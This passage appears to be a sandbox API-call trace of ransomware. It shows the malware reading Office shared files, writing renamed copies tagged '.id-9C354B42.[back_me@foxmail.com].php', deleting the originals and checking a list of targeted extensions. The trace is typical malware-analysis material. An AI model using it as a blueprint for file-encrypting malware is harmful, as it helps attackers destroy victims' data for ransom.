[0042.575] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.575] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.575] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.575] GetLastError () returned 0x0 [0042.576] ReadFile (in: hFile=0x214, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x648, lpOverlapped=0x0) returned 1 [0042.765] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x650, lpOverlapped=0x0) returned 1 [0042.766] ReadFile (in: hFile=0x214, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.766] WriteFile (in: hFile=0x20c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.766] SetEndOfFile (hFile=0x20c) returned 1 [0042.767] CloseHandle (hObject=0x20c) returned 1 [0042.767] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.767] SetEndOfFile (hFile=0x214) returned 1 [0042.768] CloseHandle (hObject=0x214) returned 1 [0042.768] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.769] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 1 [0042.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.769] lstrlenW (lpString=".doc") returned 4 [0042.769] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.769] lstrlenW (lpString=".docx") returned 5 [0042.769] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.769] lstrlenW (lpString=".pdf") returned 4 [0042.769] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.769] lstrlenW (lpString=".xls") returned 4 [0042.769] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.769] lstrlenW (lpString=".xlsx") returned 5 [0042.769] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.769] lstrlenW (lpString=".ppt") returned 4 [0042.770] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.770] lstrlenW (lpString=".zip") returned 4 [0042.770] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.770] lstrlenW (lpString=".rar") returned 4 [0042.770] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.770] lstrlenW (lpString=".bz2") returned 4 [0042.770] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.770] lstrlenW (lpString=".7z") returned 3 [0042.770] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.770] lstrlenW (lpString=".dbf") returned 4 [0042.770] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.770] lstrlenW (lpString=".1cd") returned 4 [0042.770] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.770] lstrlenW (lpString=".jpg") returned 4 [0042.770] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.770] lstrlenW (lpString=".doc") returned 4 [0042.770] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.770] lstrlenW (lpString=".docx") returned 5 [0042.770] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0042.770] lstrlenW (lpString=".pdf") returned 4 [0042.771] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.771] lstrlenW (lpString=".xls") returned 4 [0042.771] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.771] lstrlenW (lpString=".xlsx") returned 5 [0042.771] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0042.771] lstrlenW (lpString=".ppt") returned 4 [0042.771] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.771] lstrlenW (lpString=".zip") returned 4 [0042.771] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.771] lstrlenW (lpString=".rar") returned 4 [0042.771] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.771] lstrlenW (lpString=".bz2") returned 4 [0042.771] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.771] lstrlenW (lpString=".7z") returned 3 [0042.771] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.771] lstrlenW (lpString=".dbf") returned 4 [0042.771] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.771] lstrlenW (lpString=".1cd") returned 4 [0042.771] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0042.771] lstrlenW (lpString=".jpg") returned 4 [0042.771] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.772] lstrcmpiW (lpString1=".HTM", lpString2=".php") returned -1 [0042.772] lstrlenW (lpString="MCABOUT.HTM") returned 11 [0042.772] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0042.773] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=11463) returned 1 [0042.773] CloseHandle (hObject=0x214) returned 1 [0042.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 0x20 [0042.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0042.773] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.773] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0042.975] GetLastError () returned 0x0 [0042.975] ReadFile (in: hFile=0x214, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x2cc7, lpOverlapped=0x0) returned 1 [0043.202] WriteFile (in: hFile=0x200, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x2cd0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x2cd0, lpOverlapped=0x0) returned 1 [0043.203] ReadFile (in: hFile=0x214, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.203] WriteFile (in: hFile=0x200, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.203] SetEndOfFile (hFile=0x200) returned 1 [0043.203] CloseHandle (hObject=0x200) returned 1 [0043.204] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.204] SetEndOfFile (hFile=0x214) returned 1 [0043.204] CloseHandle (hObject=0x214) returned 1 [0043.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0043.205] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 1 [0043.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.205] lstrlenW (lpString=".doc") returned 4 [0043.205] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0043.205] lstrlenW (lpString=".docx") returned 5 [0043.205] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0043.205] lstrlenW (lpString=".pdf") returned 4 [0043.205] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0043.205] lstrlenW (lpString=".xls") returned 4 [0043.205] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0043.205] lstrlenW (lpString=".xlsx") returned 5 [0043.205] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0043.205] lstrlenW (lpString=".ppt") returned 4 [0043.205] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0043.205] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.205] lstrlenW (lpString=".zip") returned 4 [0043.205] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0043.205] lstrlenW (lpString=".rar") returned 4 [0043.205] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0043.206] lstrlenW (lpString=".bz2") returned 4 [0043.206] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0043.206] lstrlenW (lpString=".7z") returned 3 [0043.206] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.206] lstrlenW (lpString=".dbf") returned 4 [0043.206] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.206] lstrlenW (lpString=".1cd") returned 4 [0043.206] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.206] lstrlenW (lpString=".jpg") returned 4 [0043.206] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.206] lstrlenW (lpString=".doc") returned 4 [0043.206] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0043.206] lstrlenW (lpString=".docx") returned 5 [0043.206] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0043.206] lstrlenW (lpString=".pdf") returned 4 [0043.206] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0043.206] lstrlenW (lpString=".xls") returned 4 [0043.206] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0043.206] lstrlenW (lpString=".xlsx") returned 5 [0043.206] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0043.206] lstrlenW (lpString=".ppt") returned 4 [0043.206] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0043.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.206] lstrlenW (lpString=".zip") returned 4 [0043.206] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0043.206] lstrlenW (lpString=".rar") returned 4 [0043.206] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0043.206] lstrlenW (lpString=".bz2") returned 4 [0043.206] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0043.207] lstrlenW (lpString=".7z") returned 3 [0043.207] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0043.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.207] lstrlenW (lpString=".dbf") returned 4 [0043.207] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0043.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.207] lstrlenW (lpString=".1cd") returned 4 [0043.207] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0043.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0043.207] lstrlenW (lpString=".jpg") returned 4 [0043.207] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0043.207] lstrcmpiW (lpString1=".XSL", lpString2=".php") returned 1 [0043.207] lstrlenW (lpString="BASMLA.XSL") returned 10 [0043.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.207] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=227311) returned 1 [0043.207] CloseHandle (hObject=0x214) returned 1 [0043.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 0x20 [0043.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.208] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.208] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0043.208] GetLastError () returned 0x0 [0043.208] ReadFile (in: hFile=0x214, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x377ef, lpOverlapped=0x0) returned 1 [0043.223] WriteFile (in: hFile=0x200, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x377f0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x377f0, lpOverlapped=0x0) returned 1 [0043.228] ReadFile (in: hFile=0x214, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.228] WriteFile (in: hFile=0x200, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0043.228] SetEndOfFile (hFile=0x200) returned 1 [0043.228] CloseHandle (hObject=0x200) returned 1 [0043.231] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.231] SetEndOfFile (hFile=0x214) returned 1 [0043.234] CloseHandle (hObject=0x214) returned 1 [0043.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0043.234] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\basmla.xsl")) returned 1 [0043.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.234] lstrlenW (lpString=".doc") returned 4 [0043.234] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0043.234] lstrlenW (lpString=".docx") returned 5 [0043.234] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0043.234] lstrlenW (lpString=".pdf") returned 4 [0043.234] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0043.234] lstrlenW (lpString=".xls") returned 4 [0043.234] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0043.234] lstrlenW (lpString=".xlsx") returned 5 [0043.235] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0043.235] lstrlenW (lpString=".ppt") returned 4 [0043.235] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0043.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.235] lstrlenW (lpString=".zip") returned 4 [0043.235] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0043.235] lstrlenW (lpString=".rar") returned 4 [0043.235] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0043.235] lstrlenW (lpString=".bz2") returned 4 [0043.235] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0043.235] lstrlenW (lpString=".7z") returned 3 [0043.235] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0043.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.235] lstrlenW (lpString=".dbf") returned 4 [0043.235] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0043.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.235] lstrlenW (lpString=".1cd") returned 4 [0043.235] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0043.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.235] lstrlenW (lpString=".jpg") returned 4 [0043.235] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0043.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.235] lstrlenW (lpString=".doc") returned 4 [0043.235] lstrcmpiW (lpString1=".doc", lpString2=".XSL") returned -1 [0043.235] lstrlenW (lpString=".docx") returned 5 [0043.235] lstrcmpiW (lpString1=".docx", lpString2="A.XSL") returned -1 [0043.235] lstrlenW (lpString=".pdf") returned 4 [0043.235] lstrcmpiW (lpString1=".pdf", lpString2=".XSL") returned -1 [0043.235] lstrlenW (lpString=".xls") returned 4 [0043.235] lstrcmpiW (lpString1=".xls", lpString2=".XSL") returned -1 [0043.235] lstrlenW (lpString=".xlsx") returned 5 [0043.235] lstrcmpiW (lpString1=".xlsx", lpString2="A.XSL") returned -1 [0043.235] lstrlenW (lpString=".ppt") returned 4 [0043.235] lstrcmpiW (lpString1=".ppt", lpString2=".XSL") returned -1 [0043.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.236] lstrlenW (lpString=".zip") returned 4 [0043.236] lstrcmpiW (lpString1=".zip", lpString2=".XSL") returned 1 [0043.236] lstrlenW (lpString=".rar") returned 4 [0043.236] lstrcmpiW (lpString1=".rar", lpString2=".XSL") returned -1 [0043.236] lstrlenW (lpString=".bz2") returned 4 [0043.236] lstrcmpiW (lpString1=".bz2", lpString2=".XSL") returned -1 [0043.236] lstrlenW (lpString=".7z") returned 3 [0043.236] lstrcmpiW (lpString1=".7z", lpString2="XSL") returned -1 [0043.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.236] lstrlenW (lpString=".dbf") returned 4 [0043.236] lstrcmpiW (lpString1=".dbf", lpString2=".XSL") returned -1 [0043.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.236] lstrlenW (lpString=".1cd") returned 4 [0043.236] lstrcmpiW (lpString1=".1cd", lpString2=".XSL") returned -1 [0043.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\BASMLA.XSL") returned 73 [0043.236] lstrlenW (lpString=".jpg") returned 4 [0043.236] lstrcmpiW (lpString1=".jpg", lpString2=".XSL") returned -1 [0043.236] lstrcmpiW (lpString1=".htm", lpString2=".php") returned -1 [0043.236] lstrlenW (lpString="Bears.htm") returned 9 [0043.236] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.530] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=255) returned 1 [0045.530] CloseHandle (hObject=0x1c0) returned 1 [0045.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0x20 [0045.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0045.689] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0045.699] lstrlenW (lpString="C:\\Program 